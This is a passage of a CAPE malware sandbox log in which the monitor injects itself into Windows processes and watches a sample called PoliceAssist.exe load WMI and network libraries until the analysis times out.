13:58:16,253 [root] DEBUG: Loader: Injecting process 2552 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,259 [root] DEBUG: 2552: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:16,261 [root] DEBUG: 2552: Disabling sleep skipping.\n2025-11-20 13:58:16,261 [root] DEBUG: 2552: Interactive desktop enabled.\n2025-11-20 13:58:16,262 [root] DEBUG: 2552: Dropped file limit defaulting to 100.\n2025-11-20 13:58:16,264 [root] DEBUG: 2552: Interactive desktop - injecting Explorer Shell\n2025-11-20 13:58:16,280 [root] DEBUG: 2552: YaraInit: Compiled 43 rule files\n2025-11-20 13:58:16,283 [root] DEBUG: 2552: YaraInit: Compiled rules saved to file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:16,311 [root] DEBUG: 2552: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:16,313 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:16,416 [root] DEBUG: 608: DLL loaded at 0x00007FFEE1420000: C:\\Windows\\System32\\cfgmgr32 (0x4e000 bytes).\n2025-11-20 13:58:16,417 [root] DEBUG: 608: DLL loaded at 0x00007FFEE0870000: C:\\Windows\\system32\\DEVOBJ (0x33000 bytes).\n2025-11-20 13:58:16,418 [root] DEBUG: 608: DLL loaded at 0x00007FFEC25B0000: C:\\Windows\\System32\\ngcpopkeysrv (0x48000 bytes).\n2025-11-20 13:58:16,431 [root] DEBUG: 2552: Monitor initialised: 64-bit capemon loaded in process 2552 at 0x00007FFEB75E0000, thread 476, image base 0x00007FF735FF0000, stack from 0x0000000002A62000-0x0000000002A70000\n2025-11-20 13:58:16,433 [root] DEBUG: 608: DLL loaded at 0x00007FFEB7290000: C:\\Windows\\system32\\PCPKsp (0x118000 bytes).\n2025-11-20 13:58:16,434 [root] DEBUG: 2552: Commandline: C:\\Windows\\Explorer.EXE\n2025-11-20 13:58:16,440 [root] DEBUG: 608: DLL loaded at 0x00007FFEE2C00000: C:\\Windows\\System32\\imagehlp (0x1d000 bytes).\n2025-11-20 13:58:16,442 [root] DEBUG: 608: DLL loaded at 
0x00007FFED4740000: C:\\Windows\\system32\\tbs (0x1b000 bytes).\n2025-11-20 13:58:16,454 [root] DEBUG: 2552: Hooked 69 out of 69 functions\n2025-11-20 13:58:16,517 [root] DEBUG: 2552: Syscall hook installed, syscall logging level 1\n2025-11-20 13:58:16,534 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:16,536 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:16,540 [lib.api.process] INFO: Injected into 64-bit <Process 2552 explorer.exe>\n2025-11-20 13:58:16,625 [root] DEBUG: 608: TLS 1.2 secrets logged to: C:\\PJdnys\\tlsdump\\tlsdump.log\n2025-11-20 13:58:21,604 [root] INFO: Restarting WMI Service\n2025-11-20 13:58:23,747 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-11-20 13:58:23,748 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-11-20 13:58:23,748 [lib.core.compound] INFO: C:\\Temp already exists, skipping creation\n2025-11-20 13:58:23,771 [lib.api.process] INFO: Successfully executed process from path \"C:\\Temp\\PoliceAssist.exe\" with arguments \"\" with pid 3308\n2025-11-20 13:58:23,772 [lib.api.process] INFO: Monitor config for <Process 3308 PoliceAssist.exe>: C:\\nubpj4dt\\dll\\3308.ini\n2025-11-20 13:58:23,775 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:23,778 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:23,789 [root] DEBUG: Loader: Injecting process 3308 (thread 2188) with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:23,790 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-20 13:58:23,791 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:23,793 [lib.api.process] INFO: Injected into 64-bit <Process 3308 
PoliceAssist.exe>\n2025-11-20 13:58:25,797 [lib.api.process] INFO: Successfully resumed <Process 3308 PoliceAssist.exe>\n2025-11-20 13:58:25,811 [root] DEBUG: 3308: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:25,812 [root] DEBUG: 3308: Disabling sleep skipping.\n2025-11-20 13:58:25,813 [root] DEBUG: 3308: Interactive desktop enabled.\n2025-11-20 13:58:25,814 [root] DEBUG: 3308: Dropped file limit defaulting to 100.\n2025-11-20 13:58:25,818 [root] DEBUG: 3308: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:25,843 [root] DEBUG: 3308: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:25,844 [root] DEBUG: 3308: YaraScan: Scanning 0x0000000140000000, size 0x126a57\n2025-11-20 13:58:25,894 [root] DEBUG: 3308: Monitor initialised: 64-bit capemon loaded in process 3308 at 0x00007FFEB75E0000, thread 2188, image base 0x0000000140000000, stack from 0x00000000007F5000-0x0000000000800000\n2025-11-20 13:58:25,895 [root] DEBUG: 3308: Commandline: \"C:\\Temp\\PoliceAssist.exe\"\n2025-11-20 13:58:25,918 [root] DEBUG: 3308: hook_api: LdrpCallInitRoutine export address 0x00007FFEE34899BC obtained via GetFunctionAddress\n2025-11-20 13:58:25,973 [root] WARNING: b'Unable to place hook on LockResource'\n2025-11-20 13:58:25,974 [root] DEBUG: 3308: set_hooks: Unable to hook LockResource\n2025-11-20 13:58:25,985 [root] DEBUG: 3308: Hooked 619 out of 620 functions\n2025-11-20 13:58:26,001 [root] DEBUG: 3308: Syscall hook installed, syscall logging level 1\n2025-11-20 13:58:26,008 [root] DEBUG: 3308: RestoreHeaders: Restored original import table.\n2025-11-20 13:58:26,009 [root] INFO: Loaded monitor into process with pid 3308\n2025-11-20 13:58:26,025 [root] DEBUG: 3308: caller_dispatch: Added region at 0x0000000140000000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 
0x00000001400D415D, thread 2188).\n2025-11-20 13:58:26,026 [root] DEBUG: 3308: YaraScan: Scanning 0x0000000140000000, size 0x126a57\n2025-11-20 13:58:26,044 [root] DEBUG: 3308: ProcessImageBase: Main module image at 0x0000000140000000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,049 [root] DEBUG: 3308: set_hooks_by_export_directory: Hooked 0 out of 620 functions\n2025-11-20 13:58:26,049 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDEA70000: C:\\Windows\\SYSTEM32\\kernel.appcore (0x12000 bytes).\n2025-11-20 13:58:26,051 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE1390000: C:\\Windows\\System32\\bcryptPrimitives (0x82000 bytes).\n2025-11-20 13:58:26,055 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE5B0000: C:\\Windows\\system32\\uxtheme (0x9e000 bytes).\n2025-11-20 13:58:26,070 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE21A0000: C:\\Windows\\System32\\MSCTF (0x114000 bytes).\n2025-11-20 13:58:26,105 [root] DEBUG: 3308: DLL loaded at 0x00007FFED6980000: C:\\Windows\\SYSTEM32\\TextShaping (0xac000 bytes).\n2025-11-20 13:58:26,147 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\Wldp (0x2d000 bytes).\n2025-11-20 13:58:26,147 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:26,148 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDEC70000: C:\\Windows\\SYSTEM32\\windows.storage (0x79b000 bytes).\n2025-11-20 13:58:26,153 [root] DEBUG: 2552: caller_dispatch: Added region at 0x00007FF735FF0000 to tracked regions list (combase::CoCreateInstance returns to 0x00007FF736098FBA, thread 2996).\n2025-11-20 13:58:26,154 [root] DEBUG: 2552: YaraScan: Scanning 0x00007FF735FF0000, size 0x545316\n2025-11-20 13:58:26,217 [root] DEBUG: 2552: ProcessImageBase: Main module image at 0x00007FF735FF0000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,227 [root] DEBUG: 2552: ProcessImageBase: Main module image at 0x00007FF735FF0000 unmodified (entropy change 0.000000e+00)\n2025-11-20 13:58:26,304 
[lib.api.process] INFO: Monitor config for <Process 740 svchost.exe>: C:\\nubpj4dt\\dll\\740.ini\n2025-11-20 13:58:26,306 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:26,308 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:26,318 [root] DEBUG: Loader: Injecting process 740 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:26,322 [root] DEBUG: 740: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:26,323 [root] DEBUG: 740: Disabling sleep skipping.\n2025-11-20 13:58:26,324 [root] DEBUG: 740: Interactive desktop enabled.\n2025-11-20 13:58:26,325 [root] DEBUG: 740: Dropped file limit defaulting to 100.\n2025-11-20 13:58:26,327 [root] DEBUG: 740: Services hook set enabled\n2025-11-20 13:58:26,331 [root] DEBUG: 740: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:26,355 [root] DEBUG: 740: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:26,356 [root] DEBUG: 740: Monitor initialised: 64-bit capemon loaded in process 740 at 0x00007FFEB75E0000, thread 3172, image base 0x00007FF630560000, stack from 0x000000A00B876000-0x000000A00B880000\n2025-11-20 13:58:26,356 [root] DEBUG: 740: Commandline: C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p\n2025-11-20 13:58:26,371 [root] DEBUG: 740: Hooked 69 out of 69 functions\n2025-11-20 13:58:26,373 [root] INFO: Loaded monitor into process with pid 740\n2025-11-20 13:58:26,374 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:26,375 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:26,378 [lib.api.process] INFO: Injected into 64-bit <Process 740 svchost.exe>\n2025-11-20 13:58:29,453 [root] DEBUG: 3308: DLL 
loaded at 0x00007FFEE2C20000: C:\\Windows\\System32\\clbcatq (0xa9000 bytes).\n2025-11-20 13:58:29,473 [root] DEBUG: 3308: DLL loaded at 0x00007FFED95E0000: C:\\Windows\\SYSTEM32\\wbemcomn (0x90000 bytes).\n2025-11-20 13:58:29,473 [root] DEBUG: 3308: DLL loaded at 0x00007FFED9590000: C:\\Windows\\system32\\wbem\\wbemdisp (0x4e000 bytes).\n2025-11-20 13:58:29,485 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC850000: C:\\Windows\\system32\\wbem\\wbemprox (0x11000 bytes).\n2025-11-20 13:58:29,493 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC210000: C:\\Windows\\system32\\wbem\\wmiutils (0x28000 bytes).\n2025-11-20 13:58:29,536 [root] DEBUG: 3308: DLL loaded at 0x00007FFED94F0000: C:\\Windows\\system32\\wbem\\wbemsvc (0x14000 bytes).\n2025-11-20 13:58:29,630 [root] DEBUG: 3308: hook_api: WMI_ExecQuery export address 0x00007FFED3FCD630 obtained via GetFunctionAddress\n2025-11-20 13:58:29,651 [root] DEBUG: 3308: hook_api: WMI_ExecMethod export address 0x00007FFED40630C0 obtained via GetFunctionAddress\n2025-11-20 13:58:29,727 [root] DEBUG: 3308: DLL loaded at 0x00007FFED3FC0000: C:\\Windows\\system32\\wbem\\fastprox (0x10b000 bytes).\n2025-11-20 13:58:29,730 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE1C0000: C:\\Windows\\SYSTEM32\\amsi (0x1f000 bytes).\n2025-11-20 13:58:29,741 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE08C0000: C:\\Windows\\SYSTEM32\\sxs (0xa2000 bytes).\n2025-11-20 13:58:29,802 [root] DEBUG: 740: CreateProcessHandler: Injection info set for new process 3164: C:\\Windows\\system32\\wbem\\wmiprvse.exe, ImageBase: 0x00007FF79AAF0000\n2025-11-20 13:58:29,803 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 3164\n2025-11-20 13:58:29,804 [lib.api.process] INFO: Monitor config for <Process 3164 WmiPrvSE.exe>: C:\\nubpj4dt\\dll\\3164.ini\n2025-11-20 13:58:29,806 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:30,966 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, 
loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:30,977 [root] DEBUG: Loader: Injecting process 3164 (thread 1388) with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:30,978 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-11-20 13:58:30,979 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:30,982 [lib.api.process] INFO: Injected into 64-bit <Process 3164 WmiPrvSE.exe>\n2025-11-20 13:58:30,983 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 3164\n2025-11-20 13:58:30,984 [lib.api.process] INFO: Monitor config for <Process 3164 WmiPrvSE.exe>: C:\\nubpj4dt\\dll\\3164.ini\n2025-11-20 13:58:30,985 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:31,549 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:31,560 [root] DEBUG: Loader: Injecting process 3164 (thread 1388) with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,562 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-11-20 13:58:31,562 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,565 [lib.api.process] INFO: Injected into 64-bit <Process 3164 WmiPrvSE.exe>\n2025-11-20 13:58:31,578 [root] DEBUG: 3164: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:31,578 [root] DEBUG: 3164: Interactive desktop enabled.\n2025-11-20 13:58:31,579 [root] DEBUG: 3164: Dropped file limit defaulting to 100.\n2025-11-20 13:58:31,583 [root] DEBUG: 3164: Disabling sleep skipping.\n2025-11-20 13:58:31,584 [root] DEBUG: 3164: Services hook set enabled\n2025-11-20 13:58:31,589 [root] DEBUG: 3164: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:31,612 [root] DEBUG: 3164: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 
0x00007FFEE35DD4F0\n2025-11-20 13:58:31,613 [root] DEBUG: 3164: Monitor initialised: 64-bit capemon loaded in process 3164 at 0x00007FFEB75E0000, thread 1388, image base 0x00007FF79AAF0000, stack from 0x0000003F67AC0000-0x0000003F67AD0000\n2025-11-20 13:58:31,614 [root] DEBUG: 3164: Commandline: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding\n2025-11-20 13:58:31,629 [root] DEBUG: 3164: Hooked 69 out of 69 functions\n2025-11-20 13:58:31,636 [root] DEBUG: 3164: RestoreHeaders: Restored original import table.\n2025-11-20 13:58:31,637 [root] INFO: Loaded monitor into process with pid 3164\n2025-11-20 13:58:31,646 [root] DEBUG: 3164: set_hooks_by_export_directory: Hooked 0 out of 69 functions\n2025-11-20 13:58:31,647 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDEA70000: C:\\Windows\\SYSTEM32\\kernel.appcore (0x12000 bytes).\n2025-11-20 13:58:31,648 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE1390000: C:\\Windows\\System32\\bcryptPrimitives (0x82000 bytes).\n2025-11-20 13:58:31,652 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE2C20000: C:\\Windows\\System32\\clbcatq (0xa9000 bytes).\n2025-11-20 13:58:31,656 [lib.api.process] INFO: Monitor config for <Process 3212 svchost.exe>: C:\\nubpj4dt\\dll\\3212.ini\n2025-11-20 13:58:31,658 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor\n2025-11-20 13:58:31,660 [lib.api.process] INFO: 64-bit DLL to inject is C:\\nubpj4dt\\dll\\fdhPAc.dll, loader C:\\nubpj4dt\\bin\\KdanTrqR.exe\n2025-11-20 13:58:31,670 [root] DEBUG: Loader: Injecting process 3212 with C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,675 [root] DEBUG: 3212: Python path set to 'C:\\Users\\Admin\\AppData\\Local\\Programs\\Python\\Python313-32'.\n2025-11-20 13:58:31,675 [root] DEBUG: 3212: Disabling sleep skipping.\n2025-11-20 13:58:31,676 [root] DEBUG: 3212: Interactive desktop enabled.\n2025-11-20 13:58:31,677 [root] DEBUG: 3212: Dropped file limit defaulting to 100.\n2025-11-20 13:58:31,678 [root] DEBUG: 3212: Services 
hook set enabled\n2025-11-20 13:58:31,682 [root] DEBUG: 3212: YaraInit: Compiled rules loaded from existing file C:\\nubpj4dt\\data\\yara\\capemon.yac\n2025-11-20 13:58:31,705 [root] DEBUG: 3212: RtlInsertInvertedFunctionTable 0x00007FFEE348090E, LdrpInvertedFunctionTableSRWLock 0x00007FFEE35DD4F0\n2025-11-20 13:58:31,706 [root] DEBUG: 3212: Monitor initialised: 64-bit capemon loaded in process 3212 at 0x00007FFEB75E0000, thread 4136, image base 0x00007FF630560000, stack from 0x000000F58DDF5000-0x000000F58DE00000\n2025-11-20 13:58:31,707 [root] DEBUG: 3212: Commandline: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\n2025-11-20 13:58:31,722 [root] DEBUG: 3212: Hooked 69 out of 69 functions\n2025-11-20 13:58:31,724 [root] INFO: Loaded monitor into process with pid 3212\n2025-11-20 13:58:31,725 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-11-20 13:58:31,726 [root] DEBUG: Successfully injected DLL C:\\nubpj4dt\\dll\\fdhPAc.dll.\n2025-11-20 13:58:31,729 [lib.api.process] INFO: Injected into 64-bit <Process 3212 svchost.exe>\n2025-11-20 13:58:33,736 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC850000: C:\\Windows\\system32\\wbem\\wbemprox (0x11000 bytes).\n2025-11-20 13:58:33,755 [root] DEBUG: 3164: DLL loaded at 0x00007FFED94F0000: C:\\Windows\\system32\\wbem\\wbemsvc (0x14000 bytes).\n2025-11-20 13:58:33,774 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC210000: C:\\Windows\\system32\\wbem\\wmiutils (0x28000 bytes).\n2025-11-20 13:58:33,789 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE09F0000: C:\\Windows\\SYSTEM32\\powrprof (0x4b000 bytes).\n2025-11-20 13:58:33,790 [root] DEBUG: 3164: DLL loaded at 0x00007FFECA3F0000: C:\\Windows\\SYSTEM32\\framedynos (0x52000 bytes).\n2025-11-20 13:58:33,791 [root] DEBUG: 3164: DLL loaded at 0x00007FFEC3810000: C:\\Windows\\system32\\wbem\\cimwin32 (0x20c000 bytes).\n2025-11-20 13:58:33,793 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE09D0000: C:\\Windows\\SYSTEM32\\UMPDC 
(0x12000 bytes).\n2025-11-20 13:58:33,813 [root] DEBUG: 3164: DLL loaded at 0x00007FFECBDA0000: C:\\Windows\\SYSTEM32\\winbrand (0x35000 bytes).\n2025-11-20 13:58:33,818 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,823 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,828 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,832 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0500000: C:\\Windows\\SYSTEM32\\wldp (0x2d000 bytes).\n2025-11-20 13:58:33,834 [root] DEBUG: 3164: DLL loaded at 0x0000021E2C090000: C:\\Windows\\SYSTEM32\\SECURITY (0x3000 bytes).\n2025-11-20 13:58:33,836 [root] DEBUG: 3164: DLL loaded at 0x00007FFED5070000: C:\\Windows\\SYSTEM32\\SECUR32 (0xc000 bytes).\n2025-11-20 13:58:33,838 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDFAA0000: C:\\Windows\\system32\\schannel (0x97000 bytes).\n2025-11-20 13:58:33,888 [root] DEBUG: 3164: DLL loaded at 0x00007FFEC3B80000: C:\\Windows\\SYSTEM32\\NETAPI32 (0x19000 bytes).\n2025-11-20 13:58:33,890 [root] DEBUG: 3164: DLL loaded at 0x00007FFED5050000: C:\\Windows\\SYSTEM32\\SAMCLI (0x19000 bytes).\n2025-11-20 13:58:33,892 [root] DEBUG: 3164: DLL loaded at 0x00007FFED6E00000: C:\\Windows\\SYSTEM32\\SRVCLI (0x28000 bytes).\n2025-11-20 13:58:33,895 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0060000: C:\\Windows\\SYSTEM32\\NETUTILS (0xc000 bytes).\n2025-11-20 13:58:33,897 [root] DEBUG: 3164: DLL loaded at 0x00007FFEE0070000: C:\\Windows\\SYSTEM32\\LOGONCLI (0x43000 bytes).\n2025-11-20 13:58:33,899 [root] DEBUG: 3164: DLL loaded at 0x00007FFED9490000: C:\\Windows\\SYSTEM32\\SCHEDCLI (0xc000 bytes).\n2025-11-20 13:58:33,901 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDFCF0000: C:\\Windows\\SYSTEM32\\WKSCLI (0x19000 bytes).\n2025-11-20 13:58:33,904 [root] DEBUG: 3164: DLL loaded at 0x00007FFEDC560000: 
C:\\Windows\\SYSTEM32\\DSROLE (0xa000 bytes).\n2025-11-20 13:58:33,908 [root] DEBUG: 3164: DLL loaded at 0x00007FFECE280000: C:\\Windows\\SYSTEM32\\cscapi (0x12000 bytes).\n2025-11-20 13:58:33,968 [root] DEBUG: 3308: CAPEExceptionFilter: Exception 0xc0000005 accessing 0x0 caught at RVA 0xf0418 in capemon (expected in memory scans), passing to next handler.\n2025-11-20 13:58:33,984 [root] DEBUG: 3308: DLL loaded at 0x00007FFED5F30000: C:\\Windows\\system32\\winhttpcom (0x1e000 bytes).\n2025-11-20 13:58:33,993 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8A20000: C:\\Windows\\system32\\WINHTTP (0x10a000 bytes).\n2025-11-20 13:58:34,002 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB2E0000: C:\\Windows\\system32\\OnDemandConnRouteHelper (0x17000 bytes).\n2025-11-20 13:58:34,006 [root] DEBUG: 3308: DLL loaded at 0x00007FFEC7790000: C:\\Windows\\system32\\webio (0x98000 bytes).\n2025-11-20 13:58:34,011 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0260000: C:\\Windows\\system32\\mswsock (0x6a000 bytes).\n2025-11-20 13:58:34,015 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFF50000: C:\\Windows\\system32\\IPHLPAPI (0x3b000 bytes).\n2025-11-20 13:58:34,019 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE2110000: C:\\Windows\\System32\\NSI (0x8000 bytes).\n2025-11-20 13:58:34,020 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDAE00000: C:\\Windows\\SYSTEM32\\WINNSI (0xb000 bytes).\n2025-11-20 13:58:34,036 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFF90000: C:\\Windows\\SYSTEM32\\DNSAPI (0xca000 bytes).\n2025-11-20 13:58:34,042 [root] DEBUG: 3308: DLL loaded at 0x00007FFED87C0000: C:\\Windows\\System32\\rasadhlp (0xa000 bytes).\n2025-11-20 13:58:35,172 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8CB0000: C:\\Windows\\System32\\fwpuclnt (0x80000 bytes).\n2025-11-20 13:58:35,227 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFAA0000: C:\\Windows\\system32\\schannel (0x97000 bytes).\n2025-11-20 13:58:35,343 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB060000: 
C:\\Windows\\SYSTEM32\\mskeyprotect (0x15000 bytes).\n2025-11-20 13:58:35,345 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0530000: C:\\Windows\\SYSTEM32\\NTASN1 (0x3b000 bytes).\n2025-11-20 13:58:35,349 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0570000: C:\\Windows\\SYSTEM32\\ncrypt (0x27000 bytes).\n2025-11-20 13:58:35,352 [root] DEBUG: 3308: DLL loaded at 0x00007FFECB1A0000: C:\\Windows\\system32\\ncryptsslp (0x26000 bytes).\n2025-11-20 13:58:35,358 [root] DEBUG: 3308: DLL loaded at 0x00007FFEE0690000: C:\\Windows\\SYSTEM32\\MSASN1 (0x12000 bytes).\n2025-11-20 13:58:35,607 [root] DEBUG: 3308: DLL loaded at 0x00007FFEC5430000: C:\\Windows\\system32\\mlang (0x42000 bytes).\n2025-11-20 13:58:35,669 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDFCB0000: C:\\Windows\\SYSTEM32\\ntmarta (0x33000 bytes).\n2025-11-20 13:58:35,670 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDE0B0000: C:\\Windows\\System32\\CoreMessaging (0xf2000 bytes).\n2025-11-20 13:58:35,671 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDC8A0000: C:\\Windows\\SYSTEM32\\wintypes (0x155000 bytes).\n2025-11-20 13:58:35,672 [root] DEBUG: 3308: DLL loaded at 0x00007FFEDDD50000: C:\\Windows\\System32\\CoreUIComponents (0x35b000 bytes).\n2025-11-20 13:58:35,673 [root] DEBUG: 3308: DLL loaded at 0x00007FFED8F50000: C:\\Windows\\SYSTEM32\\textinputframework (0xf9000 bytes).\n2025-11-20 13:58:37,806 [root] DEBUG: 2552: set_hooks_by_export_directory: Hooked 0 out of 69 functions\n2025-11-20 13:58:37,807 [root] DEBUG: 2552: DLL loaded at 0x00007FFECE180000: C:\\Windows\\System32\\Windows.CloudStore.Schema.Shell (0xf4000 bytes).\n2025-11-20 14:01:46,016 [root] INFO: Analysis timeout hit, terminating analysis\n2025-11-20 14:01:46,017 [lib.api.process] INFO: Terminate event set for <Process 3308 PoliceAssist.exe>\n2025-11-20 14:01:46,019 [root] DEBUG: 3308: Terminate Event: Attempting to dump process 3308\n2025-11-20 14:01:46,022 [root] DEBUG: 3308: DoProcessDump: Skipping process dump as code is identical on 
disk.\n2025-11-20 14:01:46,035 [lib.api.process] INFO: Termination confirmed for <Process 3308 PoliceAssist.exe>\n2025-11-20 14:01:46,035 [root] INFO: Terminate event set for process 3308\n2025-11-20 14:01:46,036 [root] DEBUG: 3308: Terminate Event: monitor shutdown complete for process 3308\n2025-11-20 14:01:46,036 [lib.api.process] INFO: Terminate event set for <Process 740 svchost.exe>\n2025-11-20 14:01:46,037 [root] DEBUG: 740: Terminate Event: Attempting to dump process 740\n2025-11-20 14:01:46,038 [root] DEBUG: 740: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:46,042 [lib.api.process] INFO: Termination confirmed for <Process 740 svchost.exe>\n2025-11-20 14:01:46,043 [root] INFO: Terminate event set for process 740\n2025-11-20 14:01:46,043 [root] DEBUG: 740: Terminate Event: monitor shutdown complete for process 740\n2025-11-20 14:01:46,043 [lib.api.process] INFO: Terminate event set for <Process 3164 WmiPrvSE.exe>\n2025-11-20 14:01:46,044 [root] DEBUG: 3164: Terminate Event: Attempting to dump process 3164\n2025-11-20 14:01:46,046 [root] DEBUG: 3164: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 14:01:46,049 [root] DEBUG: 3164: Terminate Event: Shutdown complete for process 3164 but failed to inform analyzer.\n2025-11-20 14:01:51,043 [lib.api.process] INFO: Termination confirmed for <Process 3164 WmiPrvSE.exe>\n2025-11-20 14:01:51,044 [root] INFO: Terminate event set for process 3164\n2025-11-20 14:01:51,044 [lib.api.process] INFO: Terminate event set for <Process 3212 svchost.exe>\n2025-11-20 14:01:51,045 [root] DEBUG: 3212: Terminate Event: Attempting to dump process 3212\n2025-11-20 14:01:51,046 [root] DEBUG: 3212: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-11-20 